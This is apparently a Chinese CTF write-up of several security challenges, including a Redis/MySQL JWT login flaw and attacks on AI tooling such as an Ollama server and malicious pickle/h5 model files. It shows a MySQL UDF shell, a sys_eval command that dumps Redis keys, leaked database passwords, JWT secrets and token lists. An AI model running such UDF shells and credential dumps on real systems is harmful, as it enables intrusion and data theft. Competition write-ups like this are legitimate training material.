前言
最摆的一集
资产安全评估
1
公司新上线了一款商家侧电商信息发布平台,在进行安全测试时,管理员通过安全评估手段,发现可能存在安全漏洞问题。请选手下载平台提供的附件,对附件中的www.zip源码进行分析,并尝试获取后台权限,将后台中的flag提交。
20191204-124036-1.sql
INSERT INTO `ob_member` VALUES ('1', '0', 'admin', 'admin', '09d5dde58d419119571be42244e84a39', '3162875@qq.com', '0rrt5r2eg00tdut5fd18fk8sa5', '18555550710', '1575434387', '1575434378', '1', '0', '0', '1');得到加密的密码 09d5dde58d419119571be42244e84a39
看一下加密的方法
function data_md5($str, $key = 'OneBase')
{
return '' === $str ? '' : md5(sha1($str) . $key);
}emm,这也爆不出来啊
2
管理员在进一步安全测试时发现电商信息发布平台,可能存在安全漏洞问题。请选手下载平台提供的附件,对附件中的www.zip源码进行分析,并尝试获取站点权限,获取服务器中的flag并进行提交。
数据删除与恢复
1
管理员利用AI模型设计了一个结合redis和mysql的交易数据查询系统,但是未对代码的安全性进行充分验证,导致mysql中的用户虽然被删除但仍可以利用redis中的JWT信息,登录交易数据查询系统。请选手下载平台提供的附件(用户表.xlsx),根据用户表(其中1个用户为管理员测试账号,可进行数据库管理)及数据库中存在的用户,判断哪些用户在被删除后仍可以利用JWT进行登录,将用户名按照用户表中的先后排序,并使用“_”拼接后,通过md5处理后进行提交。
舍 近 求 远
由于某人 md5 时多了一个换行导致我专门进后台验证(
给的 xlsx 一个个测,测出来 zhangzehua 能正常登录且是管理员账户
数据库账密也是 zhangzehua:zhangzehua@cimer..
进入数据库后 udf 写 shell
读到 index.php
<?php
ob_start(); // 开启输出缓冲
require_once 'vendor/autoload.php';
use Firebase\JWT\JWT;
use Firebase\JWT\Key;
const JWT_KEY = '12345678901234567898765456789098';
const JWT_ALGO = 'HS256';
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASS', 'roottoor@cimer2025');
define('DB_NAME', 'new');
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$error = '';
$redis = new Redis();
$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
try {
// 连接Redis
if (!$redis->connect('127.0.0.1', 6379)) {
throw new Exception('Redis连接失败');
}
$redis->auth('root@root!cimer');
$username = trim($_POST['username'] ?? '');
$password = trim($_POST['password'] ?? '');
$payload = [
'sub' => $username,
'pwd' => $password,
'iat' => 1743299964,
];
$jwt = JWT::encode($payload, JWT_KEY, JWT_ALGO);
if ($redis->exists("jwt:{$jwt}")) {
setcookie('token', $jwt, time() + 7200, '/', '', false, true); // httponly=true
header('Location: welcome.php');
exit();
}
// 数据库验证
$stmt = $mysqli->prepare("SELECT password FROM users WHERE username = ?");
$stmt->bind_param('s', $username);
$stmt->execute();
$stmt->bind_result($storedEncryptedPassword);
$stmt->fetch();
if ($storedEncryptedPassword === $password) {
$redis->set("jwt:{$jwt}", 'valid');
setcookie('token', $jwt, time() + 7200, '/', '', false, true);
header('Location: welcome.php');
exit();
} else {
$error = '账号或密码错误';
}
} catch (Exception $e) {
$error = '系统错误:' . $e->getMessage();
} finally {
$redis->close();
$mysqli->close();
ob_end_flush(); // 结束输出缓冲
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>交易数据查询系统</title>
<style>
.login-box { width: 300px; margin: 100px auto; padding: 20px; border: 1px solid #ccc; }
.form-group { margin-bottom: 15px; }
input { width: 100%; padding: 8px; margin-top: 5px; }
button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; }
</style>
<script src="des.js"></script>
<script>
function encryptPassword() {
const username = document.querySelector('input[name="username"]').value;
const password = document.querySelector('input[name="password"]').value;
if (!username || !password) {
alert("用户名和密码不能为空");
return false;
}
const secretKey1 = "ThisIsAComplexKey123!";
const secretKey2 = "AnotherSecretKey456_";
const secretKey3 = "AndYetAnotherKey!@#";
const encryptedPassword = strEnc(password, secretKey1, secretKey2, secretKey3);
document.querySelector('input[name="password"]').value = encryptedPassword;
return true;
}
window.onload = function() {
const form = document.querySelector('form');
if (form) {
form.addEventListener('submit', function(event) {
if (!encryptPassword()) {
event.preventDefault();
}
});
}
};
</script>
</head>
<body>
<div class="login-box">
<h2>商家登录</h2>
<form method="POST">
<div class="form-group">
<label>用户名:</label>
<input type="text" name="username" required>
</div>
<div class="form-group">
<label>密码:</label>
<input type="password" name="password" required>
</div>
<button type="submit">登录</button>
</form>
</div>
</body>
</html>得到mysql数据库账密root:roottoor@cimer2025
redis数据库密码root@root!cimer
查users库
INSERT INTO `users` (`id`, `username`, `password`, `inf`, `is_admin`) VALUES
(1, 'chenxin', 'A47CDC5B7829175B88D87C6F64A9DE6FCD0F7683FD25B231D770F28CEAAB3B92', '成交量: 326次, 交易额: 23800元, 推流: 192次, 浏览: 7320次', 0),
(2, 'wuwen', '46E99CDCA9EC4EBB1740A088B2AF3924A50CF3CFC943544F', '成交量: 158次, 交易额: 42900元, 推流: 76次, 浏览: 5840次', 0),
(3, 'wanghua', '455423198CBA49DE546C1368AC7880728BE72A3825CDCC92ADA9BB8029DADA67', '成交量: 745次, 交易额: 15700元, 推流: 245次, 浏览: 8930次', 0),
(4, 'jinguizhi', 'EC943EBE2AA04024EC55BAEAB382673160EFBA0BAFB4A19E1A588164FD404001', '成交量: 482次, 交易额: 36800元, 推流: 163次, 浏览: 4320次', 0),
(5, 'guoxiaohong', 'B4CE7F02EE2A0CE94F0C2160D3CD8D73FF8DD8E3C2D2C11E8F44C616838A0DD1', '成交量: 893次, 交易额: 41200元, 推流: 278次, 浏览: 9650次', 0),
(6, 'huangzhiqiang', '5FE0DE44C3BE01588C7E39B2162852204C8168FF766674650DF3B303251B3C7D9A8AD3B177765506', '成交量: 234次, 交易额: 28700元, 推流: 94次, 浏览: 3290次', 0),
(7, 'zhangzehua', 'C412816124FADCADDD129E1A497EF7BA00D2F6A8FAD969F2D770F28CEAAB3B92696A1D2DEB1F07A9', '成交量: 671次, 交易额: 45300元, 推流: 201次, 浏览: 7580次', 1),
(8, 'zhangxiuyun', 'DE66703718E5B876C412816124FADCAD83325BEE0035E4EB66D7EE49889FDA58', '成交量: 409次, 交易额: 19600元, 推流: 132次, 浏览: 6210次', 0),
(9, 'wangming', 'A247BCD055B3AAB8EF93194C49755EEEF8393636FA0EB3A0', '成交量: 567次, 交易额: 37400元, 推流: 287次, 浏览: 8340次', 0),
(10, 'wangyan', '7F7455AEB8A3D5F3CAFB30434AF3DC03BC3293D7F1B0CD52', '成交量: 295次, 交易额: 42800元, 推流: 115次, 浏览: 4970次', 0);查redis
select sys_eval('echo "AUTH root@root!cimer\nKEYS *" | redis-cli -h localhost -p 6379')得到jwt
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuaW5neGl1cm9uZyIsInB3ZCI6IkM0MzIwMjQwQ0Y0OTMwNkI2RkY4NjA3Qzk2ODBCRUIxMzMzNkM2QzFDNjMxRUIxMTQ1MEQzNjQyQjhBM0M5NTMiLCJpYXQiOjE3NDMyOTk5NjR9.l112ZTii6Ru7FvAEoS8XsUGrN-R5M8QpKpu48hTaH-4
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJndW94aWFvaG9uZyIsInB3ZCI6IkI0Q0U3RjAyRUUyQTBDRTk0RjBDMjE2MEQzQ0Q4RDczRkY4REQ4RTNDMkQyQzExRThGNDRDNjE2ODM4QTBERDEiLCJpYXQiOjE3NDMyOTk5NjR9.dOepLP5taYHRq7ZsNeUDp5cTJqUPGFtmsDgPLpm8KN0
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJnYW50aW5ndGluZyIsInB3ZCI6IkM3NEM0QTQ0RERDQTIzNkFFMjYyOUZDMTlGNTc1MzgwQjAwMzU2MDM3QzQ3NTI4MjNGRDA5NENBM0Y4RUYzREYiLCJpYXQiOjE3NDMyOTk5NjR9.zLWkcPsjJLten17T6ldMB_rIDCxIV5hvWIPT6JJyAb0
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3YW5nZ3VpemhpIiwicHdkIjoiNDZFOTlDRENBOUVDNEVCQjBCODk0OTRCQTcwNEU4RjM0NTU0MjMxOThDQkE0OURFMEFDNTA0MDY3MDM1MDMzNEMwNDY1N0VCMzBGMEMzRDYiLCJpYXQiOjE3NDMyOTk5NjR9.SxCXfYtOc-IV4XQxSX5wN0tm0FueM7v-9lLHtQcd3bc
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJtZW5ncGVuZyIsInB3ZCI6IjU1QkMwMDUwNTI1MjlBOEIwMTc2NzI1M0IwMzkxNTE3NzlBOUZDOEQ1MTRCRjFDNzk0QTFCQ0Q2QjIwMDI1MkQyNjJCOEY3NEE2MjE5M0M5IiwiaWF0IjoxNzQzMjk5OTY0fQ.Dpg8rVrj0iAqalojRxPpdzZQeMVa5rpWwjIBmvBAU4c
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ6aGFuZ3plaHVhIiwicHdkIjoiQzQxMjgxNjEyNEZBRENBREREMTI5RTFBNDk3RUY3QkEwMEQyRjZBOEZBRDk2OUYyRDc3MEYyOENFQUFCM0I5MjY5NkExRDJERUIxRjA3QTkiLCJpYXQiOjE3NDMyOTk5NjR9.K_lkgKZ3FEp7VC1ITw8SXykVc-Qd36Af_vJEa-IYKAE
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ6aGFuZ2xpaHVhIiwicHdkIjoiNzU2MkExNTZGREM3QUY5OEM0MTI4MTYxMjRGQURDQURDMDZFRENFRDZDRjY5REUzNzg3NzYyNEFDMjFFQzE3OCIsImlhdCI6MTc0MzI5OTk2NH0.SYl4OpnMD5LQnIdMFnjUUyW0QYOsJbt2usOhVlpoEU8
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3YW5naHVhIiwicHdkIjoiNDU1NDIzMTk4Q0JBNDlERTU0NkMxMzY4QUM3ODgwNzI4QkU3MkEzODI1Q0RDQzkyQURBOUJCODAyOURBREE2NyIsImlhdCI6MTc0MzI5OTk2NH0.P4k8FRXvjsUo0dnXQ1ONN9r1FIKgTKvTWF7GVnpsaBE
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJjaGVueGluIiwicHdkIjoiQTQ3Q0RDNUI3ODI5MTc1Qjg4RDg3QzZGNjRBOURFNkZDRDBGNzY4M0ZEMjVCMjMxRDc3MEYyOENFQUFCM0I5MiIsImlhdCI6MTc0MzI5OTk2NH0.d54549DANdaGFVEc12rch0AqO1qQoeMgP5jj93QfsOc
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3dXdlbiIsInB3ZCI6IjQ2RTk5Q0RDQTlFQzRFQkIxNzQwQTA4OEIyQUYzOTI0QTUwQ0YzQ0ZDOTQzNTQ0RiIsImlhdCI6MTc0MzI5OTk2NH0.xZ5lWpI6MO4O2RhjdfsfLgh9yKDM6DTv9oJK_0ptCls
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ6aGFuZ3hpdXl1biIsInB3ZCI6IkRFNjY3MDM3MThFNUI4NzZDNDEyODE2MTI0RkFEQ0FEODMzMjVCRUUwMDM1RTRFQjY2RDdFRTQ5ODg5RkRBNTgiLCJpYXQiOjE3NDMyOTk5NjR9.bLvnDOkGFw3DvWlvwug-h8ok7AxbOFtYk-WWPewN0SM
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3YW5neWFuIiwicHdkIjoiN0Y3NDU1QUVCOEEzRDVGM0NBRkIzMDQzNEFGM0RDMDNCQzMyOTNEN0YxQjBDRDUyIiwiaWF0IjoxNzQzMjk5OTY0fQ.H3nbOVLdcvq3i7MfJLmBvmPem5ryk6Kdj7JkwGTeC3Q
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3YW5nbWluZyIsInB3ZCI6IkEyNDdCQ0QwNTVCM0FBQjhFRjkzMTk0QzQ5NzU1RUVFRjgzOTM2MzZGQTBFQjNBMCIsImlhdCI6MTc0MzI5OTk2NH0.hmw1s4c3F9ZDu7b6NJ647R_JhkgGTIdVjL1NGepcJgQ
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJqaW5ndWl6aGkiLCJwd2QiOiJFQzk0M0VCRTJBQTA0MDI0RUM1NUJBRUFCMzgyNjczMTYwRUZCQTBCQUZCNEExOUUxQTU4ODE2NEZENDA0MDAxIiwiaWF0IjoxNzQzMjk5OTY0fQ.6I4NTNRahMyOAAhTk-aSnAP7yuAxCeb8Zll2AMYnkXI
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJodWFuZ3poaXFpYW5nIiwicHdkIjoiNUZFMERFNDRDM0JFMDE1ODhDN0UzOUIyMTYyODUyMjA0QzgxNjhGRjc2NjY3NDY1MERGM0IzMDMyNTFCM0M3RDlBOEFEM0IxNzc3NjU1MDYiLCJpYXQiOjE3NDMyOTk5NjR9.FnnmCXNe8pdkL3UT9dmVjmlQ_LqwgJ4nwqvsESk9lFM解码得到
ningxiurong
guoxiaohong
gantingting
wangguizhi
mengpeng
zhangzehua
zhanglihua
wanghua
chenxin
wuwen
zhangxiuyun
wangyan
wangming
jingguizhi
huangzhiqiang对照一下得到
wangguizhi_ningxiurong_zhanglihua_mengpeng_gantingting
md5 交上去 8429e825242b4e9063862b78da1e46dd
模型环境安全
1
管理员为了方便利用AI进行办公,在服务器中搭建了一个Ollama框架,但后续发现此框架存在安全问题。请选手对Ollama框架进行安全测试,并获取服务器中的uid为1000的用户名,作为标准答案提交。
访问 /api/version,版本为 0.1.33
感觉是去年DAS十月赛的CVE,但是没记细节,寄
2
为满足工作需求,管理员在网络上下载了一批训练模型的pkl和h5文件想要进行使用。在未进行安全审计前,管理员将文件命名为””AI_models.zip””放到了文件服务器中。经过分析发现,文件中包含了恶意连接操作的文件。请选手分析出存在恶意连接操作的模型文件,并将恶意连接的主机ip和端口,作为标准答案提交。
3
根据公司内部的规定,在使用AI时,员工必须严格遵守不上传涉及公司敏感信息的要求。这些敏感信息可能包括但不限于:用户的个人资料、财务报表、员工的个人信息、研发中的技术⽅案、内部通讯记录、合同文件、商业机密、市场营销策略等任何可能对公司造成不利影响的机密数据。管理员在服务器当中搭建了本地AI模型来帮助其办公,但在某次操作时违反了公司规定,管理员想要利用AI批量对包含了用户隐私信息的图片进行批量格式转换。请选手访问文件服务器。获取””upload.zip””文件,分析附件还原上传的数据、统计用户的隐私数据数量,将隐私数据数量,作为标准答案提交。